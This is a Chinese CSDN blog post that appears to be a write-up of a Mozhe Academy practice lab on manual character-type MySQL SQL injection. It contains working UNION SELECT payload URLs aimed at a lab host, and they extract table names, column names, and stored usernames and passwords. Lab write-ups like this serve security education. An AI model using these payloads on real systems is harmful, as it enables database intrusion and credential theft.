mysql注入靶场_靶场练习-墨者学院-sql注入- 手工注入漏洞测试(MySQL数据库-字符型)...

最新推荐文章于 2024-02-10 06:24:39 发布
最新推荐文章于 2024-02-10 06:24:39 发布
阅读量146 收藏
点赞数
文章标签: mysql注入靶场
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_28733933/article/details/113568085
版权

背景知识

1.Mysql的数据结构

mysql中有一个information_schema数据库,用于维护mysql中的其他数据库信息。

其中的tables表的TABLE_SCHEMA字段为库名,TABLE_NAME字段为表名;

columns表的TABLE_SCHEMA字段为所属的数据库,TABLE_NAME字段为表名,COLUMN_NAME字段为列名。

2.手工注入方法。

是否存在过滤,是否可绕过。

是否可通过页面变化或者时间变化,判断是否存在注入点。

判断注入类型,字符型还是数字型,字符型需要构造闭合。

通过order by 判断列数。

在找到注入点,判断出union 可用的字段后,判断出所用的数据库名字和用户名字,然后再information_schema中查看对应的数据库(table_schema)有哪几个表(table_name),然后在columns查看对应的表有哪些字段。

3.md5加解密。

思路

1.判断是否存在注入点。字符型,通过‘构造闭合。

d0d4b391e6287314106b96f4992fd663.png

输入’页面发生变化

04c9b048a96ecb2a4b07114287573f7a.png

5416558cd13a9267f4742009fe8af24a.png

2.判断列数

ca9972e07d60d3141d27decb6d1957ce.png

249e869e8917d10bc4ed10ac8c1a43a1.png

3.判断位置,数据库名,用户名

bd2209e121840126fb22544586ce21c9.png

7dd6a66b45d770f30b220f14cd16a244.png

4.查询数据库中的表名

http://219.153.49.228:40812/new_list.php?id=' union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()--+

323129e378fe62d2e3c421d38c7844ed.png

5.查询数据库的字段名

http://219.153.49.228:40812/new_list.php?id=' union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema=database() and table_name='stormgroup_member'--+

6f6eb3a08bba4637d5a35f7455de18a5.png

6.查询数据库字段对应的值

http://219.153.49.228:40812/new_list.php?id=' union select 1,group_concat(name),group_concat(password),4 from stormgroup_member--+

8ddf927b64069588b3b02b7232c099f5.png

nana 不是banana
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql注入靶场实操
m0_46104808的博客
10-27 1548
sql注入漏洞利用
mysql注入靶场_某靶场sql注入练习(MySQL)
weixin_42518709的博客
02-01 455
这个之前就做了,但是当时没有做记录,所以这次重新进行一次,顺便把过程记录下来,分享给大家。-----没什么技术含量,仅仅是一次练习的记录-----启动靶场好的,现在靶场启动成功,点击“[点击访问]”进入靶场。这里是主界面:从这里可以看到,需要通过sql注入来拿到用户登陆账号密码。然后这个页面除了登陆相关的内容可以点击,就只有“登录”按钮下面的公告可以点开,这里点开公告。这里看到了一条公告,而且我们...
SQL注入操作流程及实例演示+墨者学院靶场SQL手工注入漏洞测试(MySQL数据库)
ran的博客
01-12 1687
MYsQL5.0以上版本中,Mysql 有一个系统数据库 information_schema,它是一个存储记录有所有数据库名,表名,列名的数据库,相当于利用该表可以进行一次完整的注入,通过查询它获取指定数据库下面的表名、列名、具体数据信息。当输入了一些乱七八糟的内容之后,网页返回“404错误”或者进行了跳转,则说明本网站对输入的内容可能有检测,则说明这个网站大概率没有注入漏洞。返回的了两个数字,分别是“2”、“3”,因此,修改网址上的“2”、“3”为对应系统函数来进行信息收集。可以在参数值前加“-”;
网络安全05-sql-labs靶场全网最详细总结
m0_68976043的博客
02-10 3033
sql注入有很多方式其中我们最详细见到的就是:基于错误的注入(Error-based Injection): 攻击者利用应用程序返回的错误消息来识别漏洞。通过在 SQL 查询中插入恶意代码,攻击者可以引发数据库错误,然后根据错误消息获得关于数据库结构和内容的信息。基于联合查询的注入(Union-based Injection): 攻击者利用 UNION 查询将恶意结果合并到应用程序的原始查询结果中。通过在 SQL 查询中插入 UNION 子句,攻击者可以将额外的查询结果合并到原始结果中,从而泄露敏感信息。基
五分钟制作sql注入靶场
ChenD的学习笔记
10-15 2047
接触安全也快两个月了,学了很多安全的知识,也接触到了渗透测试,前面学习了sql注入和XSS漏洞,听郭老师说可以尝试自己搭建一个靶场,所以开始制作自己靶场
墨者靶场-SQL手工注入漏洞测试(MySQL数据库-字符)
weixin_46694260的博客
03-27 3917
0x00 前言 我们都知道,SQL注入分数字字符,我们上次讲的是最基本的数字SQL注入,这次我们就来讲最基本的字符SQL注入。同样,如果是明白原理和方法的话,看懂这篇文章并不难,但是如果不清楚原理和方法的话…还是可以看的,大家多多给我点赞吧,哈哈哈哈哈,还是那句话,菜鸟一个,大佬勿喷~ 0x01 过程 首先,还是老样子,我们先看一下题目 这里通过题目我们知道,这次SQL注入字符SQL注入 那我们就进入靶场环境 可以看到和上次一样,有一个登录系统,登录框下面有一个维护新闻轮播框 我们点进去
墨者学院SQL手工注入漏洞测试(MySQL数据库字符
printfzfy的博客
12-11 331
1 点击平台停机维护 2 在这个输入框中手注 3 判断是否存在注入点 。 加’ and 1=2#,页面变化。 会显示如下图片 4 判断字段数。order by 4不报错,为4个字段 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20191211142954910.png?x-oss-process=image/watermark,type...
墨者靶场 post ,DB2,绕过登录,sql注入四关
最新发布
07-22
通关攻略墨者靶场 post ,DB2,绕过登录,sql注入四关
APP原实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
0080 APP原实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原源文件
mysql后台注入靶场源码.rar
04-21
该资源为存在漏洞的网站源码,学习web安全的小伙伴可以用来搭建环境做测试用 方法: 上传所有文件到空间根目录下,运行http://你的域名/install进行安装 安装过程遇到的数据库用户名和密码可以咨询空间你的空间商 不需要会员功能可以删除member目录 安装完成后更改admin目录为你的后台目录名,更改后的访问地址为 http://你的域名/修改的后台目录名 安装完成后请及时删除install目录
SQL注入练习.rar
06-25
sql-labs,该环境可以用来练习sql注入。是闯关类的一个靶场环境,从易到难,从简到繁。将每一关都闯过的话,对于sql注入的理解会比较深入。
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
11-13
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
mogan-main.zip
12-28
墨干编辑器是一款由墨者实验室开发的高效结构化编辑器,专为科技领域的爱好者和专业人士设计,旨在提升文本编辑、代码编写以及排版工作的体验。这款应用工具集成了多种功能,包括文本编辑、代码编辑器和排版软件,...
sql注入靶场实操
weixin_45711977的博客
06-23 3443
sql注入靶场实操
一次简单的SQL注入靶场练习
lza20001103的博客
07-24 4110
一次简单的SQL注入靶场练习
Web安全 SQL注入靶场搭建(玩转整个注入环境.)
网络安全领域___专研者.
05-25 5760
SQLI-LABS靶场概括: SQL语言就是我们在管理数据库时用到的一种。在我们的应用系统使用sql语句进行管理应用数据库时,往往采用拼接的方式形成一条完整的数据库语言,而危险的是,在拼接sql语句的时候,我们可以改变sql语句。从而让数据执行我们想要执行的语句,这就是我们常说的sql注入。而Sqli-labs是一个印度程序员写的,用来学习sql注入的一个游戏教程.
mysql注入靶场,SQL注入靶场—Post注入 Rank1-3
weixin_36476970的博客
03-18 148
---------------------------------Rank 1 -------------------------------------------------先在表单Username编辑框中输入1,点登录,页面回显如下:image.png然后在Username中输入1',点登录,再看回显,看是否存在注入:image.png可看到存在注入,且从错误提示信息中可以看到,数据库是My...
SQLi LABS Less-7 布尔盲注
热门推荐
wangyuxiang946的博客
04-01 1万+
SQLi 第七关,sqli-labs less-7,sqlilabs less 7
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究...总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值